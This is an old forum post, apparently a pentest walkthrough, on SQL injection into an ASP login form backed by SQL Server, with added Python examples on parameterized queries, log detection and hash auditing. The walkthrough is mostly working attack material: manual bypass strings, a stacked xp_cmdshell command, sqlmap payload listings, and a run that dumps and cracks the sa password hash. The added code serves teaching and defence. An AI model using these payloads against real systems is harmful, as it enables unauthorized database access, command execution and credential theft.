SQLMAP POST

Posted on 2012-9-15 23:27:56

RE: http://www.cao.com/forum.php?mod=viewthread&tid=610&extra=page%3D1  MSSQL SQL INJ

Packet capture and analysis

Look at the source of the submission page to see how it submits:

    <form name="frmLogin" action="login.asp" method="post">
    Username: <input type="text" name="userName">
    Password: <input type="text" name="password">
    <input type="submit">
    </form>
Clearly it is POST, so we need to capture the submitted POST data. A Firefox plugin does this, as shown in the figure below:


Manual testing

With the request captured it is easy. Let's test by hand.
Submit the injection string:

    ---------------------------------
    Username: ' having 1=1 ---
    Password: anything
    ---------------------------------
Returns: Logged In
Submit the injection string:
    ---------------------------------
    Username: ' having 1=2 ---
    Password: anything
    ---------------------------------
Returns: Bad Credentials
This shows that the injection exists.
We submit:
    Username: '; exec master..xp_cmdshell 'iisreset'; --
    Password: anything
Returns:
Microsoft OLE DB Provider for SQL Server 错误 '80004005'[DBNETLIB][ConnectionOpen (Connect()).]SQL Server 不存在或拒绝访问。/login.asp,行 14
What actually gets executed is:
    select userName from users where userName='';  exec master..xp_cmdshell 'iisreset'; --' and userPass=''
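To make that concrete, here is an added Python example (not code from the post or from the target's login.asp) that reproduces the string-concatenated query above, using sqlite3 as a stand-in for SQL Server, and places the parameterized version beside it. The users table, the password 's3cret' and all function names are constructed for the demo.

```python
import sqlite3


def make_users_db():
    # Constructed stand-in for the login page's backing table; not the target's data.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userName TEXT, userPass TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def build_query_unsafe(user, pwd):
    # The construction login.asp must be using: both form fields are pasted
    # straight into the SQL text, so a quote in either field ends the literal
    # and whatever follows is parsed as SQL.
    return ("select userName from users where userName='%s' and userPass='%s'"
            % (user, pwd))


def login_unsafe(conn, user, pwd):
    """Vulnerable check. Returns (logged_in, error_text)."""
    sql = build_query_unsafe(user, pwd)
    try:
        rows = conn.execute(sql).fetchall()
    except (sqlite3.Warning, sqlite3.Error) as exc:
        # The sqlite3 module refuses a second statement in one execute();
        # SQL Server does not, which is why the stacked xp_cmdshell payload
        # ran on the target. Either way the error text is what a user would
        # see as the 500 / OLE DB message shown in the post.
        return False, str(exc)
    return bool(rows), None


def login_safe(conn, user, pwd):
    """Hardened check: the driver binds the values, so they are never parsed as SQL."""
    rows = conn.execute(
        "select userName from users where userName=? and userPass=?",
        (user, pwd)).fetchall()
    return bool(rows)


if __name__ == "__main__":
    db = make_users_db()
    stacked = "'; exec master..xp_cmdshell 'iisreset'; --"
    print(build_query_unsafe(stacked, ""))
    print(login_unsafe(db, "admin' --", "wrong"))   # (True, None): the comment drops the password check
    print(login_safe(db, "admin' --", "wrong"))     # False: the quote and comment are just characters
    print(login_safe(db, "admin", "s3cret"))        # True
```

The `--` comment trick behaves the same in SQLite and SQL Server, so the bypass line shows the real effect of concatenation; the stacked payload differs only because the sqlite3 module rejects multiple statements per call, whereas SQL Server executes them, which is the gap the post exploits. The fix in both cases is the bound-parameter query, not input filtering.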
Automated injection

Now we run sqlmap directly against it:
    root@Dis9Team:~# sqlmap -u "http://5.5.5.134/login.asp" --data "userName=123&password=123"

        sqlmap/1.0-dev (r4911) - automatic SQL injection and database takeover tool

    http://www.sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 21:13:27

    [21:13:27] [INFO] using '/pen/sqlmap-dev/output/5.5.5.134/session' as session file
    [21:13:27] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
    [21:13:27] [INFO] testing connection to the target url
    [21:13:27] [INFO] heuristics detected web page charset 'ascii'
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: POST
    Parameter: password
        Type: error-based
        Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
        Payload: userName=admin&password=admin' AND 8376=CONVERT(INT,(CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (8376=8376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58))) AND 'YvOd'='YvOd

        Type: UNION query
        Title: Generic UNION query (NULL) - 1 column
        Payload: userName=admin&password=-1537' UNION SELECT CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+CHAR(117)+CHAR(84)+CHAR(86)+CHAR(119)+CHAR(105)+CHAR(109)+CHAR(100)+CHAR(101)+CHAR(122)+CHAR(114)+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58)--  AND 'WzKD'='WzKD

        Type: stacked queries
        Title: Microsoft SQL Server/Sybase stacked queries
        Payload: userName=admin&password=admin'; WAITFOR DELAY '0:0:5';-- AND 'LmZG'='LmZG

        Type: AND/OR time-based blind
        Title: Microsoft SQL Server/Sybase time-based blind
        Payload: userName=admin&password=admin' WAITFOR DELAY '0:0:5'-- AND 'ugPK'='ugPK

    Place: POST
    Parameter: userName
        Type: error-based
        Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
        Payload: userName=admin' AND 1780=CONVERT(INT,(CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (1780=1780) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58))) AND 'tmdk'='tmdk&password=admin

        Type: UNION query
        Title: Generic UNION query (NULL) - 1 column
        Payload: userName=-1984' UNION SELECT CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+CHAR(107)+CHAR(121)+CHAR(122)+CHAR(100)+CHAR(68)+CHAR(71)+CHAR(84)+CHAR(87)+CHAR(98)+CHAR(105)+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58)--  AND 'CTkR'='CTkR&password=admin

        Type: stacked queries
        Title: Microsoft SQL Server/Sybase stacked queries
        Payload: userName=admin'; WAITFOR DELAY '0:0:5';-- AND 'Nbcb'='Nbcb&password=admin

        Type: AND/OR time-based blind
        Title: Microsoft SQL Server/Sybase time-based blind
        Payload: userName=admin' WAITFOR DELAY '0:0:5'-- AND 'EBhZ'='EBhZ&password=admin
    ---

    there were multiple injection points, please select the one to use for following injections:
    [0] place: POST, parameter: userName, type: Single quoted string (default)
    [1] place: POST, parameter: password, type: Single quoted string
    [q] Quit
    >
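From the defender's side, every technique sqlmap lists above (the error-based CONVERT/CHAR probe, UNION SELECT, stacked WAITFOR DELAY, the time-based variant) and its default User-Agent string are visible in request logs, provided the log records the POST body, which plain IIS W3C logs do not. The following added Python example (not part of the post) runs a small rule set over a constructed log format that does capture the body; the log layout, rule names and sample lines are assumptions, and the payload fragments in the samples are taken from the post.

```python
import re
from urllib.parse import unquote_plus

# Detection rules keyed on the payload types sqlmap reported against login.asp.
# They are coarse indicators, meant to raise an alert, not to block on their own.
RULES = {
    "os-command-proc":     re.compile(r"xp_cmdshell", re.I),
    "time-based-blind":    re.compile(r"waitfor\s+delay", re.I),
    "having-probe":        re.compile(r"'\s*having\s+1\s*=\s*\d", re.I),
    "error-based-convert": re.compile(r"convert\s*\(\s*int\s*,.*char\s*\(", re.I),
    "union-select":        re.compile(r"union\s+(all\s+)?select", re.I),
    "comment-terminator":  re.compile(r"'\s*(--|;)"),
}
UA_RULE = re.compile(r"sqlmap", re.I)

# Assumed log layout (a WAF or application log that keeps the POST body):
#   <date> <time> <client-ip> <method> <path> "<body>" "<user-agent>"
LINE_RE = re.compile(r'^(\S+ \S+) (\S+) (\S+) (\S+) "([^"]*)" "([^"]*)"$')

# Constructed sample lines; the injection strings are the ones shown in the post.
SAMPLE_LOG = """\
2012-09-15 21:05:01 5.5.5.1 POST /login.asp "userName=alice&password=hunter2" "Mozilla/5.0"
2012-09-15 21:05:10 5.5.5.7 POST /login.asp "userName=%27+having+1%3D1+---&password=x" "Mozilla/5.0"
2012-09-15 21:13:27 5.5.5.7 POST /login.asp "userName=admin%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B--+AND+%27LmZG%27%3D%27LmZG&password=admin" "sqlmap/1.0-dev (r4911)"
2012-09-15 21:13:28 5.5.5.7 POST /login.asp "userName=admin%27+AND+1780%3DCONVERT(INT%2C(CHAR(58)%2BCHAR(99)))+AND+%27tmdk%27%3D%27tmdk&password=admin" "sqlmap/1.0-dev (r4911)"
2012-09-15 21:20:01 5.5.5.9 POST /login.asp "userName=%27%3B+exec+master..xp_cmdshell+%27iisreset%27%3B+--&password=x" "Mozilla/5.0"
"""


def analyse_line(line):
    """Return a finding dict for a suspicious request line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, ip, method, path, body, ua = m.groups()
    decoded = unquote_plus(body)  # form bodies arrive percent-encoded; match the decoded text
    hits = [name for name, rx in RULES.items() if rx.search(decoded)]
    if UA_RULE.search(ua):
        hits.append("sqlmap-user-agent")
    if not hits:
        return None
    return {"ts": ts, "ip": ip, "method": method, "path": path, "rules": hits}


def scan_log(text):
    """Run analyse_line over every non-empty line and keep only the findings."""
    return [f for f in (analyse_line(l) for l in text.splitlines() if l.strip()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ts"], finding["ip"], finding["path"], ", ".join(finding["rules"]))
```

The legitimate login for alice produces no finding, the manual `' having 1=1 ---` probe is caught by a single rule, and the sqlmap runs light up both a payload rule and the User-Agent rule; the `comment-terminator` rule fires on its own for any quote followed by `--` or `;`, so it is worth weighting lower than the named techniques when turning these into alerts.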
Here sqlmap asks which form field, userName or password, to inject through; either one works.
I chose 0, injecting through userName, and got:
    > 0

    [21:14:33] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows XP
    web application technology: ASP, Microsoft IIS 5.1
    back-end DBMS: Microsoft SQL Server 2005
    [21:14:33] [INFO] Fetched data logged to text files under '/pen/sqlmap-dev/output/5.5.5.134'

    [*] shutting down at 21:14:33
The target's database version is out.

Fetching data
    root@Dis9Team:~# sqlmap -u "http://5.5.5.134/login.asp" --data "userName=123&password=123" --passwords

        sqlmap/1.0-dev (r4911) - automatic SQL injection and database takeover tool

    http://www.sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 21:15:45

    [21:15:45] [INFO] using '/pen/sqlmap-dev/output/5.5.5.134/session' as session file
    [21:15:45] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
    [21:15:45] [INFO] testing connection to the target url
    [21:15:45] [INFO] heuristics detected web page charset 'ascii'
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: POST
    Parameter: password
        Type: error-based
        Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
        Payload: userName=admin&password=admin' AND 8376=CONVERT(INT,(CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (8376=8376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58))) AND 'YvOd'='YvOd

        Type: UNION query
        Title: Generic UNION query (NULL) - 1 column
        Payload: userName=admin&password=-1537' UNION SELECT CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+CHAR(117)+CHAR(84)+CHAR(86)+CHAR(119)+CHAR(105)+CHAR(109)+CHAR(100)+CHAR(101)+CHAR(122)+CHAR(114)+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58)--  AND 'WzKD'='WzKD

        Type: stacked queries
        Title: Microsoft SQL Server/Sybase stacked queries
        Payload: userName=admin&password=admin'; WAITFOR DELAY '0:0:5';-- AND 'LmZG'='LmZG

        Type: AND/OR time-based blind
        Title: Microsoft SQL Server/Sybase time-based blind
        Payload: userName=admin&password=admin' WAITFOR DELAY '0:0:5'-- AND 'ugPK'='ugPK

    Place: POST
    Parameter: userName
        Type: error-based
        Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
        Payload: userName=admin' AND 1780=CONVERT(INT,(CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (1780=1780) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58))) AND 'tmdk'='tmdk&password=admin

        Type: UNION query
        Title: Generic UNION query (NULL) - 1 column
        Payload: userName=-1984' UNION SELECT CHAR(58)+CHAR(99)+CHAR(104)+CHAR(99)+CHAR(58)+CHAR(107)+CHAR(121)+CHAR(122)+CHAR(100)+CHAR(68)+CHAR(71)+CHAR(84)+CHAR(87)+CHAR(98)+CHAR(105)+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58)--  AND 'CTkR'='CTkR&password=admin

        Type: stacked queries
        Title: Microsoft SQL Server/Sybase stacked queries
        Payload: userName=admin'; WAITFOR DELAY '0:0:5';-- AND 'Nbcb'='Nbcb&password=admin

        Type: AND/OR time-based blind
        Title: Microsoft SQL Server/Sybase time-based blind
        Payload: userName=admin' WAITFOR DELAY '0:0:5'-- AND 'EBhZ'='EBhZ&password=admin
    ---

    there were multiple injection points, please select the one to use for following injections:
    [0] place: POST, parameter: userName, type: Single quoted string (default)
    [1] place: POST, parameter: password, type: Single quoted string
    [q] Quit
    > 0

    [21:15:47] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows XP
    web application technology: ASP, Microsoft IIS 5.1
    back-end DBMS: Microsoft SQL Server 2005
    [21:15:47] [INFO] fetching database users password hashes
    [21:15:47] [INFO] heuristics detected web page charset 'GB2312'
    [21:15:47] [INFO] the SQL query used returns 1 entries
    [21:15:47] [INFO] retrieved: "[u'sa', u'0x01004086ceb628aa51dd7e821560d52c6a6...
    do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y

    [21:15:50] [INFO] using hash method 'mssql_passwd'
    what dictionary do you want to use?
    [1] default dictionary file '/pen/sqlmap-dev/txt/wordlist.txt' (press Enter)
    [2] custom dictionary file
    [3] file with list of dictionary files
    > 1

    [21:15:52] [INFO] using default dictionary
    [21:15:52] [INFO] loading dictionary from '/pen/sqlmap-dev/txt/wordlist.txt'
    do you want to use common password suffixes? (slow!) [y/N] y

    [21:15:54] [INFO] starting dictionary-based cracking (mssql_passwd)
    [21:15:54] [INFO] starting 2 processes
    [21:15:55] [INFO] cracked password '123456' for user 'sa'
    database management system users password hashes:
    [*] sa [1]:
        password hash: 0x01004086ceb628aa51dd7e821560d52c6a6b5dc187421c6e8057
            header: 0x0100
            salt: 4086ceb6
            mixedcase: 28aa51dd7e821560d52c6a6b5dc187421c6e8057
        clear-text password: 123456

    [21:15:55] [WARNING] HTTP error codes detected during testing:
    500 (Internal Server Error) - 2 times
    [21:15:55] [INFO] Fetched data logged to text files under '/pen/sqlmap-dev/output/5.5.5.134'

    [*] shutting down at 21:15:55

    root@Dis9Team:~#
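The breakdown sqlmap prints (header 0x0100, 4-byte salt, SHA1) is the SQL Server 2005 password_hash layout: a single SHA1 over the UTF-16LE password followed by the salt, which is why a six-digit sa password falls to a wordlist in a second. The added Python example below (not code from the post or from sqlmap) parses that layout and audits a set of logins against a short list of known-weak passwords, the check a DBA would run over their own sys.sql_logins. The only real value in it is the sa hash from the post; the second login, its password, the fixed salt and the weak list are constructed for the demo.

```python
import hashlib
import hmac
import os

# Hash printed by sqlmap in the post for the 'sa' login (SQL Server 2005 format).
PAGE_SA_HASH = "0x01004086ceb628aa51dd7e821560d52c6a6b5dc187421c6e8057"


def parse_mssql2005_hash(h):
    """Split a 2005-style hash into (salt_hex, sha1_hex): 0x0100 | 4-byte salt | 20-byte SHA1."""
    h = h.lower()
    if h.startswith("0x"):
        h = h[2:]
    if len(h) != 52 or not h.startswith("0100"):
        raise ValueError("not a SQL Server 2005 password hash")
    return h[4:12], h[12:]


def mssql2005_digest(password, salt):
    # SHA1 over the UTF-16LE encoded password followed by the raw 4-byte salt.
    return hashlib.sha1(password.encode("utf-16le") + salt).hexdigest()


def make_mssql2005_hash(password, salt=None):
    """Build a hash in the same layout (random salt unless one is supplied)."""
    salt = salt if salt is not None else os.urandom(4)
    return "0x0100" + salt.hex() + mssql2005_digest(password, salt)


def verify_mssql2005(password, h):
    salt_hex, digest = parse_mssql2005_hash(h)
    candidate = mssql2005_digest(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, digest)


def audit_logins(logins, weak_passwords):
    """logins: {login_name: hash}. Returns {login_name: matched_weak_password}."""
    found = {}
    for name, h in logins.items():
        for pw in weak_passwords:
            if verify_mssql2005(pw, h):
                found[name] = pw
                break
    return found


if __name__ == "__main__":
    # Constructed second login with a fixed salt so the run is reproducible.
    app_hash = make_mssql2005_hash("Tr0ub4dor&3", bytes.fromhex("01020304"))
    logins = {"sa": PAGE_SA_HASH, "app_ro": app_hash}
    weak = ["password", "123456", "admin", "sa"]  # constructed, deliberately tiny
    print(audit_logins(logins, weak))  # {'sa': '123456'}
```

Run against real output of `SELECT name, password_hash FROM sys.sql_logins`, a hit means that login needs rotating and, for sa, disabling; the salt is only four bytes and the function is plain SHA1, so a weak password offers no protection regardless of how the hash is stored.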



